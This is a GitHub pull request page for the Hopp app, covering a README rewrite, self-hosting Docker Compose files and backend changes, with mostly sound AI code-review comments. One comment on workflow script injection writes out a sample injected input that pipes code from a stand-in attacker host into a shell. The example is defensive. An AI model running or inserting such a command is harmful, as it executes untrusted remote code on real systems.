Conversation
Restructure README to maximize GitHub stars and gethopp.app signups: - Add prominent nav row (Website, Download, Sign up, Docs, Self-host, Discord, Twitter) - Add demo GIF placeholder above the fold - Add GitHub stars badge to encourage starring - Rewrite tagline for dev audience + Tuple alternative positioning - Add 3-step Try Hopp section (download, sign up, pair) - Rename Features → Why Hopp, reorder for dev appeal - Add Cap-style self-host quickstart tease linking to selfhost/README.md - Add Paid Cloud supports development section (Plausible-style) - Collapse tech stack and roadmap sections - Add SEO keywords: pair programming, screen sharing for developers, self-hosted
✅ Deploy Preview for hoppdocs ready!
To edit notification comments on pull requests, go to your Netlify project configuration. |
📝 WalkthroughWalkthroughThreads a Stripe billing feature flag through backend access checks, moves custom backend URL into persisted per-user settings with event wiring, adds a full self-hosting Docker Compose + LiveKit/Caddy configs, updates Dockerfile and CI to multi-arch publishing, bumps Go deps, and rewrites README/docs. ChangesStripe Billing Feature Flag
Desktop App: Custom Backend URL (Tauri)
Self-hosting Infrastructure & Docker/CI
Backend Dependency Bumps
Documentation & README
Sequence Diagram(s)sequenceDiagram
participant Client
participant Handler as Backend Handler
participant Config as Config
participant Models as Models/DB
Client->>Handler: request (user/room/join)
Handler->>Config: IsStripeEnabled()
Handler->>Models: GetUserWithSubscription(user, stripeEnabled)
alt stripeEnabled == false
Models-->>Handler: UserWithSubscription{IsPro:true}
else
Models-->>Handler: UserWithSubscription{IsPro/Trial computed}
end
Handler-->>Client: allow or deny based on subscription/trial
Estimated code review effort🎯 4 (Complex) | ⏱️ ~60 minutes Possibly related PRs
Suggested reviewers
Poem
🚥 Pre-merge checks | ✅ 4 | ❌ 1❌ Failed checks (1 inconclusive)
✅ Passed checks (4 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches📝 Generate docstrings
🧪 Generate unit tests (beta)
Warning There were issues while running some tools. Please review the errors and either fix the tool's configuration or disable the tool if it's a critical failure. 🔧 golangci-lint (2.12.1)level=error msg="[linters_context] typechecking error: pattern ./...: directory prefix . does not contain main module or its selected dependencies" Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
There was a problem hiding this comment.
Actionable comments posted: 15
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
tauri/src/windows/window-utils.ts (1)
292-297:⚠️ Potential issue | 🟠 Major | ⚡ Quick winClear auth before broadcasting the backend switch.
set_hopp_server_urlemitshopp_server_url_changed, and only after that do we delete the stored token here. That creates a window where the main app can repoint to the new backend while still holding the old JWT, which risks sending that token to the wrong server. Please either clear the token first or make this an atomic backend command.Suggested fix
const setHoppServerUrl = async (url: string | null): Promise<void> => { try { - await invoke("set_hopp_server_url", { url }); - // Sign out the user when changing the server URL await deleteStoredToken(); + await invoke("set_hopp_server_url", { url }); } catch (error) { console.error("Failed to set hopp server url:", error); throw error; } };🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@tauri/src/windows/window-utils.ts` around lines 292 - 297, The setHoppServerUrl function currently calls invoke("set_hopp_server_url") before deleting the stored token, risking the old JWT being sent to a newly pointed backend; change the sequence so you clear local auth first (call deleteStoredToken() before invoke) or, alternatively, modify the backend command to atomically both change the URL and clear auth; update the setHoppServerUrl method to call deleteStoredToken() prior to invoke("set_hopp_server_url", { url }) (or implement an atomic invoke like "set_hopp_server_url_and_clear_token") and ensure error handling still covers both operations.
🧹 Nitpick comments (2)
backend/dev-compose.yml (1)
24-26: 💤 Low valueUnused named volume declaration — consider removing.
The top-level
volumes.cacheentry is never mounted by any service; bothcache(Redis) anddb(Postgres) use bind mounts directly. Addingdriver: localto this already-unreferenced volume adds dead configuration that could mislead future readers into thinking a named volume is in active use.🗑️ Proposed cleanup
-volumes: - cache: - driver: local🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@backend/dev-compose.yml` around lines 24 - 26, Remove the unused top-level named volume declaration for "cache" under the compose top-level "volumes" section (the orphaned volumes.cache entry with driver: local); either delete that volumes.cache block entirely or switch the Redis/Postgres service volume bindings (services named "cache" and "db") to reference the named volume instead — update whichever approach you choose so there is no dead configuration remaining and service volume references (cache/db) match the declared volume names.web-app/src/constants.ts (1)
25-28: ⚡ Quick winBuild the backend endpoints with
new URL()instead of string concatenation.This works, but it goes against the repo’s frontend URL-construction rule and is easier to break on base-path/trailing-slash changes. Prefer composing these endpoints with
new URL().Suggested refactor
export const BACKEND_URLS = { BASE: baseUrl, - AUTHENTICATE_APP: `${baseUrl}/api/auth/authenticate-app`, - INVITATION_DETAILS: (uuid: string) => `${baseUrl}/api/invitation-details/${uuid}`, + AUTHENTICATE_APP: new URL("/api/auth/authenticate-app", baseUrl).toString(), + INVITATION_DETAILS: (uuid: string) => new URL(`/api/invitation-details/${uuid}`, baseUrl).toString(), } as const;As per coding guidelines, Use
new URL()andURLSearchParamsinstead of string concatenation for URL construction in frontend code.🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@web-app/src/constants.ts` around lines 25 - 28, The BACKEND_URLS entries currently concatenate strings which breaks the repository rule and can fail on base-path or trailing-slash changes; update AUTHENTICATE_APP and INVITATION_DETAILS to build endpoints with new URL(path, BASE) (or new URL(path, baseUrl) where BASE is defined) and return their .toString() (for the INVITATION_DETAILS function use the provided uuid to create the path via new URL(`/api/invitation-details/${uuid}`, BASE).toString()); ensure AUTHENTICATE_APP is created the same way (new URL('/api/auth/authenticate-app', BASE).toString()) while leaving BASE referencing the existing baseUrl variable.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/publish-backend-image.yml:
- Line 38: The workflow step running the shell command "cp
web-app/static/react/assets/index.html backend/web/web-app.html" can fail if the
target directory backend/web does not exist; modify the step to ensure the
directory exists before copying by running a directory-creation guard (e.g.,
mkdir -p backend/web) prior to the cp command so the copy is safe regardless of
repo state.
- Around line 52-58: The step currently expands the workflow input expression
directly in the shell which allows command injection; instead assign the
expression to a dedicated environment variable (e.g., INPUT_TAG) via the step's
env: mapping or an earlier safe assignment so the shell only sees a plain
string, then in the run: body read that env var into TAG (fall back to
GITHUB_REF when INPUT_TAG is empty) and write to GITHUB_OUTPUT and the tags line
using the TAG variable; update references to github.event.inputs.tag, TAG,
GITHUB_REF and GITHUB_OUTPUT accordingly and ensure all uses are quoted or
treated as data, not raw expanded expressions.
In `@backend/Dockerfile`:
- Around line 13-19: The container currently runs as root; add a USER directive
to switch to the distroless nonroot user (uid 65532) before CMD to satisfy
least-privilege (e.g., USER 65532), and ensure the artifacts copied by COPY
--from=builder /out/server and COPY web ./web are readable/executable by that
user (adjust build-stage ownership or chown in the builder stage so /app/server
and /app/web are owned by uid 65532) so the server binary can run under the
nonroot account.
In `@backend/internal/handlers/handlers.go`:
- Around line 590-593: GetUserWithSubscription is crashing when called from the
handlers (user.TeamID can be nil for users created without a team), so update
the GetUserWithSubscription function in models/user.go to guard against a nil
TeamID before dereferencing it: add an early nil-check (or use safe handling)
for the TeamID path the function takes, handle the no-team case (e.g., skip
team-related lookups or return a sensible default) and ensure the function
returns a non-panicking result/error back to callers like the call site in
handlers.go that invokes GetUserWithSubscription.
In `@backend/internal/models/user.go`:
- Around line 277-284: In GetUserWithSubscription, avoid dereferencing
user.TeamID when stripeEnabled is true by adding a nil guard before calling
GetTeamByID: if user.TeamID == nil, return a sensible default
UserWithSubscription (e.g., User: *user and IsPro: false or other
application-expected values) rather than calling
GetTeamByID(strconv.Itoa(int(*user.TeamID))); otherwise proceed to call
GetTeamByID as now. This change in GetUserWithSubscription will prevent the
panic observed when handlers.User calls this function for users created via
ManualSignUp with a nil TeamID.
In `@docs/src/content/docs/features/settings.mdx`:
- Around line 17-25: The docs are inconsistent with the implementation: update
the copy and defaults to match UserSettings::default() by changing the dock-icon
description so that enabling show_dock_icon_in_call keeps the dock icon visible
during calls (e.g., "Show dock icon when in call — Keep the dock icon visible
during a call. Default: on.") and change the microphone default text to reflect
start_mic_on_call defaults to false (e.g., "Start microphone on call start —
Automatically unmute the microphone when a call starts. Default: off."). Ensure
the referenced setting names show_dock_icon_in_call and start_mic_on_call are
mentioned so readers map them to UserSettings::default().
In `@docs/src/content/docs/open-source/self-hosting.md`:
- Around line 56-58: Update the domain placeholder in Step 5 to match the rest
of the doc: replace the literal `{DOMAIN}` with the same notation used elsewhere
(e.g., `${DOMAIN}` or the concrete example `hopp.example.com`) so the
instruction "Open `https://{DOMAIN}`" becomes "Open `https://${DOMAIN}`" (or
`https://hopp.example.com`) to avoid confusion between shell variables and
template placeholders.
In `@selfhost/.env.example`:
- Line 6: Update the misleading comment in the .env.example so it explicitly
warns that while the stack can start with only DOMAIN set, SESSION_SECRET,
LIVEKIT_API_KEY, LIVEKIT_API_SECRET, and POSTGRES_PASSWORD must be regenerated
for any production deployment; replace the line "# Only DOMAIN is strictly
required. All secrets should be generated." with a clear security notice naming
those variables and stating that their current defaults (empty or publicly-known
values) are insecure and must be replaced with strong, generated secrets before
production.
In `@selfhost/compose.override.example.yml`:
- Around line 15-22: The livekit compose example currently has two sibling
"ports" keys so the second overrides the first making "ports: !reset []"
ineffective; fix by consolidating into a single ports key that uses the !reset
tag with the desired list value (replace the duplicate "ports:" block and the
separate "ports: !reset []" with one "ports: !reset" whose value is the full
ports list), updating the livekit block so the reset semantics apply correctly.
In `@selfhost/compose.yml`:
- Around line 5-13: Add a healthcheck to the db service so Postgres is marked
healthy only after it accepts connections: under the db service (image
postgres:16-alpine) add a healthcheck that runs pg_isready (or equivalent), with
sensible interval, timeout, retries and start_period so initialization completes
before healthy; then update the backend's depends_on entry to wait for the db
service becoming healthy (depends_on -> condition/service_healthy or the compose
version-appropriate depends_on: db: {condition: service_healthy} / waiting
behavior) so migrations/startup won't run until the DB is ready.
- Line 24: The Docker Compose service image is using an unpinned tag
"livekit/livekit-server:latest" which can introduce breaking upgrades; update
the image reference in compose.yml (the "image: livekit/livekit-server:latest"
entry) to a specific major or patch tag (e.g., "livekit/livekit-server:v1.8.4"
or another tested release) and document/coordinate bumping that tag alongside
HOPP_VERSION so the LiveKit version is intentionally upgraded.
- Line 36: Update the Docker image reference from the maintainer's personal
namespace to the project namespace by replacing "iparaskev/hopp-backend" with
"gethopp/hopp-backend" in the compose service image declaration (preserve the
existing tag variable format ${HOPP_VERSION:-latest}); ensure the change is made
where the image: line is defined so the service uses
gethopp/hopp-backend:${HOPP_VERSION:-latest} instead of the iparaskev image.
In `@tauri/src-tauri/src/app_state.rs`:
- Line 12: Add a one-release migration that preserves the old top-level
hopp_server_url by copying it into the new nested user_settings field during
load/deserialization; specifically, in the AppState load/migration path (where
AppState is constructed/deserialized), check the old top-level hopp_server_url
field and if user_settings.hopp_server_url (or equivalent) is None/empty and the
top-level hopp_server_url is Some(value), set user_settings.hopp_server_url =
value and clear or ignore the top-level field afterwards so existing self-hosted
endpoints are retained for upgrades.
In `@tauri/src/windows/main-window/login.tsx`:
- Line 16: The loginJwtUrl construction using template literals can produce
double-scheme URLs when customServerUrl includes a scheme; update the logic that
builds loginJwtUrl to parse/normalize the base using new URL(...) with a default
scheme fallback (use import.meta.env.VITE_API_BASE_URL when customServerUrl is
empty), then create the final URL by resolving the '/login-app' path via new
URL('/login-app', baseUrl). Ensure you reference and update the variable
loginJwtUrl and the source values customServerUrl and
import.meta.env.VITE_API_BASE_URL so the base always has a valid scheme and
pathname resolution is done by the URL API rather than string concatenation.
In `@tauri/src/windows/settings/main.tsx`:
- Around line 147-160: The handlers (onKeyDown/onBlur) call
tauriUtils.setHoppServerUrl and unconditionally
posthog.capture("custom_backend_url_changed"); change this so the analytics
event is only emitted for hosted analytics: compute const trimmed =
serverUrl.trim() || null, await tauriUtils.setHoppServerUrl(trimmed) and
refetchSettings as before, but only call
posthog.capture("custom_backend_url_changed") when the change is not switching
to a self-hosted backend (e.g., trimmed !== null) AND a hosted-analytics flag is
enabled (check an existing flag like settings.isHostedAnalyticsEnabled or inject
a isHostedAnalyticsEnabled helper); alternatively remove the posthog.capture
call from these handlers entirely if no hosted-only flag is available. Ensure
you update both the onKeyDown and onBlur handlers and use
settings.hopp_server_url/refetchSettings/serverUrl to determine the change.
---
Outside diff comments:
In `@tauri/src/windows/window-utils.ts`:
- Around line 292-297: The setHoppServerUrl function currently calls
invoke("set_hopp_server_url") before deleting the stored token, risking the old
JWT being sent to a newly pointed backend; change the sequence so you clear
local auth first (call deleteStoredToken() before invoke) or, alternatively,
modify the backend command to atomically both change the URL and clear auth;
update the setHoppServerUrl method to call deleteStoredToken() prior to
invoke("set_hopp_server_url", { url }) (or implement an atomic invoke like
"set_hopp_server_url_and_clear_token") and ensure error handling still covers
both operations.
---
Nitpick comments:
In `@backend/dev-compose.yml`:
- Around line 24-26: Remove the unused top-level named volume declaration for
"cache" under the compose top-level "volumes" section (the orphaned
volumes.cache entry with driver: local); either delete that volumes.cache block
entirely or switch the Redis/Postgres service volume bindings (services named
"cache" and "db") to reference the named volume instead — update whichever
approach you choose so there is no dead configuration remaining and service
volume references (cache/db) match the declared volume names.
In `@web-app/src/constants.ts`:
- Around line 25-28: The BACKEND_URLS entries currently concatenate strings
which breaks the repository rule and can fail on base-path or trailing-slash
changes; update AUTHENTICATE_APP and INVITATION_DETAILS to build endpoints with
new URL(path, BASE) (or new URL(path, baseUrl) where BASE is defined) and return
their .toString() (for the INVITATION_DETAILS function use the provided uuid to
create the path via new URL(`/api/invitation-details/${uuid}`,
BASE).toString()); ensure AUTHENTICATE_APP is created the same way (new
URL('/api/auth/authenticate-app', BASE).toString()) while leaving BASE
referencing the existing baseUrl variable.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: 9a5bbd7a-8bba-44ec-8482-c5b8cac5de04
⛔ Files ignored due to path filters (4)
backend/go.sumis excluded by!**/*.sumdocs/src/assets/demo.gifis excluded by!**/*.gifdocs/src/assets/settings.pngis excluded by!**/*.pngdocs/src/assets/view.pngis excluded by!**/*.png
📒 Files selected for processing (33)
.github/workflows/publish-backend-image.ymlREADME.mdbackend/Dockerfilebackend/Taskfile.ymlbackend/dev-compose.ymlbackend/docker-files/fullstack-compose.ymlbackend/go.modbackend/internal/config/config.gobackend/internal/handlers/handlers.gobackend/internal/handlers/slackHandlers.gobackend/internal/handlers/utils.gobackend/internal/handlers/websocketHandlers.gobackend/internal/models/user.godocs/astro.config.mjsdocs/src/content/docs/features/settings.mdxdocs/src/content/docs/open-source/self-hosting.mdselfhost/.env.exampleselfhost/.gitignoreselfhost/Caddyfileselfhost/README.mdselfhost/compose.override.example.ymlselfhost/compose.ymlselfhost/livekit.dev.yamlselfhost/livekit.yamltauri/src-tauri/src/app_state.rstauri/src-tauri/src/main.rstauri/src/core_payloads.tstauri/src/windows/main-window/app.tsxtauri/src/windows/main-window/login.tsxtauri/src/windows/main-window/tabs/Debug.tsxtauri/src/windows/settings/main.tsxtauri/src/windows/window-utils.tsweb-app/src/constants.ts
💤 Files with no reviewable changes (1)
- backend/docker-files/fullstack-compose.yml
| run: yarn workspace web-app build | ||
|
|
||
| - name: Inject web-app into backend | ||
| run: cp web-app/static/react/assets/index.html backend/web/web-app.html |
There was a problem hiding this comment.
backend/web/ may not exist when cp runs, silently breaking the image build
If backend/web/ is not committed to the repo (it contains generated content), cp will fail with "No such file or directory". Add a mkdir -p guard so the step is safe regardless of repo state.
🔧 Proposed fix
- name: Inject web-app into backend
- run: cp web-app/static/react/assets/index.html backend/web/web-app.html
+ run: |
+ mkdir -p backend/web
+ cp web-app/static/react/assets/index.html backend/web/web-app.html📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| run: cp web-app/static/react/assets/index.html backend/web/web-app.html | |
| - name: Inject web-app into backend | |
| run: | | |
| mkdir -p backend/web | |
| cp web-app/static/react/assets/index.html backend/web/web-app.html |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/publish-backend-image.yml at line 38, The workflow step
running the shell command "cp web-app/static/react/assets/index.html
backend/web/web-app.html" can fail if the target directory backend/web does not
exist; modify the step to ensure the directory exists before copying by running
a directory-creation guard (e.g., mkdir -p backend/web) prior to the cp command
so the copy is safe regardless of repo state.
| if [[ -n "${{ github.event.inputs.tag }}" ]]; then | ||
| TAG="${{ github.event.inputs.tag }}" | ||
| else | ||
| TAG="${GITHUB_REF#refs/tags/}" | ||
| fi | ||
| echo "version=$TAG" >> "$GITHUB_OUTPUT" | ||
| echo "tags=gethopp/hopp-backend:${TAG},gethopp/hopp-backend:latest" >> "$GITHUB_OUTPUT" |
There was a problem hiding this comment.
Script injection: ${{ github.event.inputs.tag }} is expanded directly into the shell command
GitHub Actions ${{ }} expressions inside run: blocks are substituted before the shell interprets the command. When a workflow_dispatch input is placed directly in a run: block, an actor who can trigger the workflow can break out of the intended command and execute arbitrary code. An input like v1.0"; curl attacker.com/x | sh; echo " would run unimpeded.
Assign the expression to an environment variable so the shell always treats it as a plain string:
🔒 Proposed fix
- name: Determine image tags
id: tags
+ env:
+ INPUT_TAG: ${{ github.event.inputs.tag }}
run: |
- if [[ -n "${{ github.event.inputs.tag }}" ]]; then
- TAG="${{ github.event.inputs.tag }}"
+ if [[ -n "$INPUT_TAG" ]]; then
+ TAG="$INPUT_TAG"
else
TAG="${GITHUB_REF#refs/tags/}"
fi
echo "version=$TAG" >> "$GITHUB_OUTPUT"
echo "tags=gethopp/hopp-backend:${TAG},gethopp/hopp-backend:latest" >> "$GITHUB_OUTPUT"🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/publish-backend-image.yml around lines 52 - 58, The step
currently expands the workflow input expression directly in the shell which
allows command injection; instead assign the expression to a dedicated
environment variable (e.g., INPUT_TAG) via the step's env: mapping or an earlier
safe assignment so the shell only sees a plain string, then in the run: body
read that env var into TAG (fall back to GITHUB_REF when INPUT_TAG is empty) and
write to GITHUB_OUTPUT and the tags line using the TAG variable; update
references to github.event.inputs.tag, TAG, GITHUB_REF and GITHUB_OUTPUT
accordingly and ensure all uses are quoted or treated as data, not raw expanded
expressions.
| FROM gcr.io/distroless/static-debian12 | ||
| WORKDIR /app | ||
| COPY --from=builder /out/server . | ||
| COPY web ./web | ||
|
|
||
| # Set environment variable to disable TLS | ||
| ENV USE_TLS=false | ||
|
|
||
| # Run the binary | ||
| CMD ["./server"] No newline at end of file | ||
| EXPOSE 1926 | ||
| CMD ["./server"] |
There was a problem hiding this comment.
Container runs as root — add a USER directive before CMD
The distroless runtime image ships a built-in nonroot user (uid 65532). Running the server as root violates the principle of least privilege and is flagged by Trivy rule DS-0002.
🔒 Proposed fix
FROM gcr.io/distroless/static-debian12
WORKDIR /app
COPY --from=builder /out/server .
COPY web ./web
ENV USE_TLS=false
EXPOSE 1926
+USER nonroot:nonroot
CMD ["./server"]📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| FROM gcr.io/distroless/static-debian12 | |
| WORKDIR /app | |
| COPY --from=builder /out/server . | |
| COPY web ./web | |
| # Set environment variable to disable TLS | |
| ENV USE_TLS=false | |
| # Run the binary | |
| CMD ["./server"] | |
| \ No newline at end of file | |
| EXPOSE 1926 | |
| CMD ["./server"] | |
| FROM gcr.io/distroless/static-debian12 | |
| WORKDIR /app | |
| COPY --from=builder /out/server . | |
| COPY web ./web | |
| ENV USE_TLS=false | |
| EXPOSE 1926 | |
| USER nonroot:nonroot | |
| CMD ["./server"] |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@backend/Dockerfile` around lines 13 - 19, The container currently runs as
root; add a USER directive to switch to the distroless nonroot user (uid 65532)
before CMD to satisfy least-privilege (e.g., USER 65532), and ensure the
artifacts copied by COPY --from=builder /out/server and COPY web ./web are
readable/executable by that user (adjust build-stage ownership or chown in the
builder stage so /app/server and /app/web are owned by uid 65532) so the server
binary can run under the nonroot account.
| userWithSubscription, err := models.GetUserWithSubscription(h.DB, user, h.Config.IsStripeEnabled()) | ||
| if err != nil { | ||
| return c.JSON(http.StatusInternalServerError, map[string]string{"error": err.Error()}) | ||
| } |
There was a problem hiding this comment.
This call site is the concrete exposure for the nil TeamID panic in GetUserWithSubscription.
Users created without a team (no team_name, no invite UUID in ManualSignUp) reach this line with user.TeamID == nil. Adding the nil guard to GetUserWithSubscription (see comment in models/user.go) resolves this without changes here.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@backend/internal/handlers/handlers.go` around lines 590 - 593,
GetUserWithSubscription is crashing when called from the handlers (user.TeamID
can be nil for users created without a team), so update the
GetUserWithSubscription function in models/user.go to guard against a nil TeamID
before dereferencing it: add an early nil-check (or use safe handling) for the
TeamID path the function takes, handle the no-team case (e.g., skip team-related
lookups or return a sensible default) and ensure the function returns a
non-panicking result/error back to callers like the call site in handlers.go
that invokes GetUserWithSubscription.
| func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) { | ||
| if !stripeEnabled { | ||
| return &UserWithSubscription{User: *user, IsPro: true}, nil | ||
| } | ||
|
|
||
| team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID))) | ||
| if err != nil { | ||
| return nil, err |
There was a problem hiding this comment.
Missing nil guard for user.TeamID on the Stripe-enabled path may panic.
When stripeEnabled == true, execution falls through to line 282, which dereferences user.TeamID unconditionally. A user created via ManualSignUp without a team name or invite UUID has TeamID == nil, so calling User() on that account in a cloud deployment will panic here.
The checkUserHasAccess path is safe (it guards in utils.go before calling this function), but the User() handler in handlers.go calls GetUserWithSubscription directly with no nil pre-check.
🛡️ Proposed fix — add nil guard after the stripeEnabled early return
func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) {
if !stripeEnabled {
return &UserWithSubscription{User: *user, IsPro: true}, nil
}
+
+ if user.TeamID == nil {
+ return &UserWithSubscription{User: *user, IsPro: false}, nil
+ }
team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID)))📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) { | |
| if !stripeEnabled { | |
| return &UserWithSubscription{User: *user, IsPro: true}, nil | |
| } | |
| team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID))) | |
| if err != nil { | |
| return nil, err | |
| func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) { | |
| if !stripeEnabled { | |
| return &UserWithSubscription{User: *user, IsPro: true}, nil | |
| } | |
| if user.TeamID == nil { | |
| return &UserWithSubscription{User: *user, IsPro: false}, nil | |
| } | |
| team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID))) | |
| if err != nil { | |
| return nil, err | |
| } |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@backend/internal/models/user.go` around lines 277 - 284, In
GetUserWithSubscription, avoid dereferencing user.TeamID when stripeEnabled is
true by adding a nil guard before calling GetTeamByID: if user.TeamID == nil,
return a sensible default UserWithSubscription (e.g., User: *user and IsPro:
false or other application-expected values) rather than calling
GetTeamByID(strconv.Itoa(int(*user.TeamID))); otherwise proceed to call
GetTeamByID as now. This change in GetUserWithSubscription will prevent the
panic observed when handlers.User calls this function for users created via
ManualSignUp with a nil TeamID.
| - cache | ||
|
|
||
| backend: | ||
| image: iparaskev/hopp-backend:${HOPP_VERSION:-latest} |
There was a problem hiding this comment.
Move backend image to the project's own Docker Hub namespace
iparaskev/hopp-backend is the PR author's personal Docker Hub account. If the image is removed or the account is renamed, every self-hosted deployment breaks with no recourse. For an OSS project this is a critical supply-chain reliability gap; the image should live under the gethopp/ organization (e.g., gethopp/hopp-backend).
🔧 Proposed fix
- image: iparaskev/hopp-backend:${HOPP_VERSION:-latest}
+ image: gethopp/hopp-backend:${HOPP_VERSION:-latest}📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| image: iparaskev/hopp-backend:${HOPP_VERSION:-latest} | |
| image: gethopp/hopp-backend:${HOPP_VERSION:-latest} |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@selfhost/compose.yml` at line 36, Update the Docker image reference from the
maintainer's personal namespace to the project namespace by replacing
"iparaskev/hopp-backend" with "gethopp/hopp-backend" in the compose service
image declaration (preserve the existing tag variable format
${HOPP_VERSION:-latest}); ensure the change is made where the image: line is
defined so the service uses gethopp/hopp-backend:${HOPP_VERSION:-latest} instead
of the iparaskev image.
| const posthog = usePostHog(); | ||
| const customServerUrl = useStore((state) => state.customServerUrl); | ||
|
|
||
| const loginJwtUrl = `https://${customServerUrl || (import.meta.env.VITE_API_BASE_URL as string)}/login-app`; |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
# Check how customServerUrl / hopp_server_url is set in settings
rg -n "hopp_server_url\|setHoppServerUrl\|customServerUrl" --type=ts -C3
# Check VITE_API_BASE_URL definition / usage
rg -n "VITE_API_BASE_URL" -C3Repository: gethopp/hopp
Length of output: 3230
🏁 Script executed:
cd tauri && find . -name "*.tsx" -o -name "*.ts" | xargs grep -l "customServerUrl" | head -5Repository: gethopp/hopp
Length of output: 191
🏁 Script executed:
cd web-app && cat -n src/constants.tsRepository: gethopp/hopp
Length of output: 1404
🏁 Script executed:
grep -rn "hopp_server_url\|customServerUrl" tauri/ --include="*.ts" --include="*.tsx" -B2 -A2Repository: gethopp/hopp
Length of output: 5891
🏁 Script executed:
grep -n "serverUrl" tauri/src/windows/settings/main.tsx -B5 -A10 | head -50Repository: gethopp/hopp
Length of output: 1738
🏁 Script executed:
grep -rn "set_hopp_server_url\|setHoppServerUrl" tauri/src/windows/ --include="*.ts" --include="*.tsx" -B3 -A3Repository: gethopp/hopp
Length of output: 2438
🏁 Script executed:
find . -name "*.rs" -o -name "*.go" | xargs grep -l "set_hopp_server_url\|hopp_server_url" 2>/dev/null | head -3Repository: gethopp/hopp
Length of output: 121
🏁 Script executed:
rg "set_hopp_server_url" --type=rs -B3 -A10 2>/dev/null | head -40Repository: gethopp/hopp
Length of output: 38
🏁 Script executed:
cat tauri/src-tauri/src/app_state.rs | grep -n "hopp_server_url\|set_hopp_server_url" -B2 -A8 | head -50Repository: gethopp/hopp
Length of output: 593
🏁 Script executed:
rg "hopp_server_url" tauri/src-tauri/src/main.rs -B3 -A8Repository: gethopp/hopp
Length of output: 1360
Use new URL() to prevent double-scheme corruption and satisfy coding guidelines
The code hardcodes https:// but customServerUrl has no validation—users can paste full URLs like https://myserver.com, producing https://https://myserver.com/login-app, which breaks login for self-hosted deployments. Additionally, template-literal URL construction violates the frontend coding guidelines.
Replace with new URL() and normalize the base URL to ensure it always carries a scheme:
🔧 Proposed fix
- const loginJwtUrl = `https://${customServerUrl || (import.meta.env.VITE_API_BASE_URL as string)}/login-app`;
+ const rawBase = customServerUrl || (import.meta.env.VITE_API_BASE_URL as string);
+ const baseUrl = rawBase.startsWith("http") ? rawBase : `https://${rawBase}`;
+ const loginJwtUrl = new URL("/login-app", baseUrl).toString();📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| const loginJwtUrl = `https://${customServerUrl || (import.meta.env.VITE_API_BASE_URL as string)}/login-app`; | |
| const rawBase = customServerUrl || (import.meta.env.VITE_API_BASE_URL as string); | |
| const baseUrl = rawBase.startsWith("http") ? rawBase : `https://${rawBase}`; | |
| const loginJwtUrl = new URL("/login-app", baseUrl).toString(); |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@tauri/src/windows/main-window/login.tsx` at line 16, The loginJwtUrl
construction using template literals can produce double-scheme URLs when
customServerUrl includes a scheme; update the logic that builds loginJwtUrl to
parse/normalize the base using new URL(...) with a default scheme fallback (use
import.meta.env.VITE_API_BASE_URL when customServerUrl is empty), then create
the final URL by resolving the '/login-app' path via new URL('/login-app',
baseUrl). Ensure you reference and update the variable loginJwtUrl and the
source values customServerUrl and import.meta.env.VITE_API_BASE_URL so the base
always has a valid scheme and pathname resolution is done by the URL API rather
than string concatenation.
There was a problem hiding this comment.
🧹 Nitpick comments (1)
docs/src/content/docs/open-source/self-hosting.md (1)
118-127: ⚡ Quick winClarify the mixed TLS setup for local development.
The local development configuration enables
